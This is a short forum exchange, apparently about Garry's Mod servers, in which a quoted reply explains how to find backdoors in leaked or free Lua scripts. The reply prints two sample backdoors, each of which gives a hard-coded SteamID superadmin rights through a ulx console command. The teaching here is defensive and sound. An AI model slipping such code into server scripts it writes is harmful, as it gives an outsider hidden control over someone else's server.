ThatGuyz
Novice
Level:
Credits:
OP
09-04-2020, 10:24 PM
08-04-2020, 06:24 PM
Lakeey Wrote:
Hello ThatGuyz, backdoors can be located anywhere randomly in a .lua file. One of the best ways to make sure you do not have any backdoors is to run through each Lua file you've downloaded that was leaked or some free "premium" scripts that were given by a generous player. When you are looking through your Lua file look for something like this.

Code:
if ( ply:SteamID() == "STEAM_0:1:00000000") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else

Code:
concommand.Add( "Nestor", function(ply) if ( ply:SteamID() == "STEAM_0:0:82261024") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Bye " .. ply:Name() .. ".") end end)

Backdoors are just your admin module and rcon commands being run through a .lua file. Seems pretty simple right? Usually, some people put backdoors in scripts that contain a lot of files. So that's when a backdoor scanner comes in. Some game servers have them as an option to be installed for free, some don't have them at all. There are some safe ones out there for free if I could find one I wouldn't mind helping you to find one. So basically at the end of the day, backdoors are nothing more than admin module commands (ulx, serverguard etc.) and rcon commands being run through a .lua file. And to easily remove a backdoor is just remove the line(s) of code! Hope that helped you!
Thanks for taking your time explaining it for me, thank you very much